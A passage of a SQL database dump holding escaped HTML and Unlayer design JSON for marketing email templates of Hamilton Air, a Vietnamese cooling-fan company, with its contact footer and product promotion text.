style=\\\"width:32px; padding-right: 14px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 14px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/instagram.com\\/\\\" title=\\\"Instagram\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/rounded\\/instagram.png\\\" alt=\\\"Instagram\\\" title=\\\"Instagram\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 0px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/soundcloud.com\\/\\\" title=\\\"SoundCloud\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/rounded\\/soundcloud.png\\\" alt=\\\"SoundCloud\\\" title=\\\"SoundCloud\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    \\r\\n    <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 20px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"line-height: 150%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 150%;\\\">T\\u1ed5ng \\u0111\\u00e0i b\\u00e1n h\\u00e0ng: 028.73033369<br \\/>EMAIL: sale@hogiaphat.vn\\u00a0<br \\/>SR Th\\u1ee7 \\u0110\\u1ee9c: 184 Tr\\u1ea7n L\\u1ef1u, An Ph\\u00fa, Tp Th\\u1ee7 \\u0110\\u1ee9c, Tp HCM<\\/p>\\r\\n<p style=\\\"line-height: 150%;\\\">SR Qu\\u1eadn 7: Happy Valley, 812 Nguy\\u1ec5n V\\u0103n Linh, T\\u00e2n Phong, Qu\\u1eadn 7, Tp HCM<br \\/>\\u00a0<br \\/>\\u00a9Hamiton Air Fans\\u2122. All Rights Reserved.<\\/p>\\r\\n<p style=\\\"line-height: 150%;\\\">C\\u00d4NG TY C\\u1ed4 PH\\u1ea6N C\\u00d4NG NGH\\u1ec6 HAMILTON AIR<br \\/>MST: 0315778682 do s\\u1edf KH v\\u00e0 \\u0111\\u1ea7u t\\u01b0 Tp.HCM.\\u00a0<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #a47e6b;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #a47e6b;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #ffffff; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\">Too many emails?\\u00a0<a rel=\\\"noopener\\\" href=\\\"https:\\/\\/hogiaphat.vn\\/lien-he\\\" target=\\\"_blank\\\"> <span style=\\\"text-decoration: underline; font-size: 14px; line-height: 19.6px;\\\">Unsubscribe<\\/span><\\/a><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n    <!--[if (mso)|(IE)]><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n  <\\/tbody>\\r\\n  <\\/table>\\r\\n  <!--[if mso]><\\/div><![endif]-->\\r\\n  <!--[if IE]><\\/div><![endif]-->\\r\\n<\\/body>\\r\\n\\r\\n<\\/html>\\r\\n\"');
INSERT INTO `tblma_emails` (`id`, `name`, `type`, `category`, `segment`, `published`, `language`, `description`, `addedfrom`, `dateadded`, `color`, `subject`, `email_template`, `from_name`, `from_address`, `reply_to_address`, `bcc_address`, `attachment`, `data_design`, `data_html`) VALUES
(3, 'Tổ chức đào tạo WIT', '', 1, 0, 1, 'vietnamese', '', 1, '2023-02-20 14:56:38', '#049911', 'Tổ chức đào tạo WIT', 7, '', '', '', '', '', '\"{\\\"counters\\\":{\\\"u_row\\\":19,\\\"u_column\\\":28,\\\"u_content_text\\\":38,\\\"u_content_image\\\":16,\\\"u_content_button\\\":6,\\\"u_content_social\\\":2,\\\"u_content_divider\\\":5,\\\"u_content_heading\\\":9},\\\"body\\\":{\\\"id\\\":\\\"UmVb3KA4Xy\\\",\\\"rows\\\":[{\\\"id\\\":\\\"5MgZae-Tgg\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"7w1rPghIyp\\\",\\\"contents\\\":[{\\\"id\\\":\\\"JJFvhlnT_y\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"22px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1676879143752-LOGO-HA.png\\\",\\\"width\\\":1063,\\\"height\\\":525,\\\"maxWidth\\\":\\\"49%\\\",\\\"autoWidth\\\":false},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_1\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_1\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#ffffff\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_1\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"-bOhuFx8md\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"TsQkk5SEgo\\\",\\\"contents\\\":[{\\\"id\\\":\\\"6rCUuP3Anm\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"200px 44px 100px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Raleway\\\",\\\"value\\\":\\\"\'Raleway\',sans-serif\\\",\\\"url\\\":\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Raleway:400,700\\\",\\\"defaultFont\\\":true,\\\"weights\\\":[400,700]},\\\"fontWeight\\\":700,\\\"fontSize\\\":\\\"160px\\\",\\\"color\\\":\\\"#ffffff\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_1\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\">THI\\u1ebeT K\\u1ebe - T\\u01af V\\u1ea4N - CUNG C\\u1ea4P<\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\">GI\\u1ea2I PH\\u00c1P QU\\u1ea0T L\\u00c0M M\\u00c1T<\\/p>\\\",\\\"hideMobile\\\":false},\\\"hasDeprecatedFontControls\\\":true}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_2\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#236fa1\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677300816479-login_customers800.jpg\\\",\\\"fullWidth\\\":false,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"width\\\":800,\\\"height\\\":450,\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_2\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"b8vIWbq5f2\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"44NvVvyFY_\\\",\\\"contents\\\":[{\\\"id\\\":\\\"iwVbyx9tfH\\\",\\\"type\\\":\\\"heading\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"headingType\\\":\\\"h1\\\",\\\"fontSize\\\":\\\"22px\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_heading_1\\\",\\\"htmlClassNames\\\":\\\"u_content_heading\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"THI\\u1ebeT K\\u1ebe T\\u01af V\\u1ea4N GI\\u1ea2I PH\\u00c1P QU\\u1ea0T L\\u00c0M M\\u00c1T\\\"}},{\\\"id\\\":\\\"khH4HCU0qh\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Helvetica\\\",\\\"value\\\":\\\"helvetica,sans-serif\\\",\\\"url\\\":\\\"\\\",\\\"defaultFont\\\":true},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_27\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\">D\\u00e0nh cho nh\\u00e0 x\\u01b0\\u1edfng, c\\u00f4ng nghi\\u1ec7p, v\\u0103n ph\\u00f2ng th\\u01b0\\u01a1ng m\\u1ea1i, nh\\u00e0 \\u1edf cao c\\u1ea5p.<\\/p>\\\"}},{\\\"id\\\":\\\"GnyONZJkpD\\\",\\\"type\\\":\\\"heading\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"headingType\\\":\\\"h2\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Global Font\\\",\\\"value\\\":\\\"inherit\\\"},\\\"fontWeight\\\":700,\\\"fontSize\\\":\\\"17px\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_heading_2\\\",\\\"htmlClassNames\\\":\\\"u_content_heading\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<strong>L\\u00c0M M\\u00c1T M\\u00d4I TR\\u01af\\u1edcNG C\\u00d4NG NGHI\\u1ec6P<\\/strong>\\\"}},{\\\"id\\\":\\\"tKNtLdC-mG\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Global Font\\\",\\\"value\\\":\\\"inherit\\\"},\\\"fontWeight\\\":700,\\\"fontSize\\\":\\\"14px\\\",\\\"color\\\":\\\"#236fa1\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_35\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\">D\\u00e0nh cho nh\\u00e0 x\\u01b0\\u1edfng c\\u00f4ng nghi\\u1ec7p, n\\u00f4ng nghi\\u1ec7p, s\\u1ea3n xu\\u1ea5t, kho ch\\u1ee9a...<\\/p>\\\"}}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_26\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"center\\\"},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_17\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"nTFm-wXMi_\\\",\\\"cells\\\":[1,1],\\\"columns\\\":[{\\\"id\\\":\\\"KjGW3PJmuG\\\",\\\"contents\\\":[{\\\"id\\\":\\\"UVoTTP0tLw\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Global Font\\\",\\\"value\\\":\\\"inherit\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_28\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\">Trong m\\u00f4i tr\\u01b0\\u1eddng c\\u00f4ng nghi\\u1ec7p, vi\\u1ec7c ki\\u1ec3m so\\u00e1t lu\\u1ed3ng gi\\u00f3 kh\\u00f4ng kh\\u00ed \\u0111\\u1ea3m b\\u1ea3o nhi\\u1ec7t \\u0111\\u1ed9 ch\\u00eanh l\\u1ec7ch t\\u1eeb 3-6 \\u0111\\u1ed9 C v\\u1edbi kh\\u1ea3 n\\u0103ng ti\\u1ebft ki\\u1ec7m \\u0111i\\u1ec7n h\\u00e0ng n\\u0103m. Ch\\u1ec9 c\\u00f3 qu\\u1ea1t treo tr\\u1ea7n, qu\\u1ea1t th\\u1ed5i s\\u00e0n c\\u00f4ng nghi\\u1ec7p HVLS s\\u1ebd ph\\u00f9 cho b\\u1ea5t c\\u1ee9 kh\\u00f4ng gian r\\u1ed9ng l\\u1edbn n\\u00e0o v\\u1edbi hi\\u1ec7u su\\u1ea5t l\\u00e0m m\\u00e1t tuy\\u1ec7t v\\u1eddi, ki\\u1ec3m so\\u00e1t kh\\u00f4ng kh\\u00ed th\\u1ed5i s\\u00e0n \\u0111\\u01b0a lu\\u1ed3ng kh\\u00ed \\u0111\\u1ebfn nh\\u1eefng n\\u01a1i c\\u1ea7n thi\\u1ebft.<\\/p>\\\"}},{\\\"id\\\":\\\"Ah6uVwnv-M\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#e67e23\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 20px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"4px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_3\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"T\\u00ccM HI\\u1ec2U TH\\u00caM &gt;&gt;\\\",\\\"calculatedWidth\\\":165,\\\"calculatedHeight\\\":37},\\\"hasDeprecatedFontControls\\\":true}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_15\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}},{\\\"id\\\":\\\"nInngqY0R8\\\",\\\"contents\\\":[{\\\"id\\\":\\\"XoCeovpFlk\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677301324631-home_cf.jpg\\\",\\\"width\\\":1000,\\\"height\\\":600},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_12\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_16\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"center\\\"},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_11\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"qWZjzDtY7n\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"gPVHcgxH1i\\\",\\\"contents\\\":[{\\\"id\\\":\\\"D5JSJd9Ztm\\\",\\\"type\\\":\\\"heading\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"headingType\\\":\\\"h2\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Open Sans\\\",\\\"value\\\":\\\"\'Open Sans\',sans-serif\\\",\\\"url\\\":\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Open+Sans:400,700\\\",\\\"defaultFont\\\":true,\\\"weights\\\":[400,700]},\\\"fontWeight\\\":700,\\\"fontSize\\\":\\\"17px\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_heading_4\\\",\\\"htmlClassNames\\\":\\\"u_content_heading\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<strong>L\\u00c0M M\\u00c1T M\\u00d4I TR\\u01af\\u1edcNG V\\u0102N PH\\u00d2NG - TT TH\\u01af\\u01a0NG M\\u1ea0I<\\/strong>\\\"}},{\\\"id\\\":\\\"DQGkqwu9e1\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Global 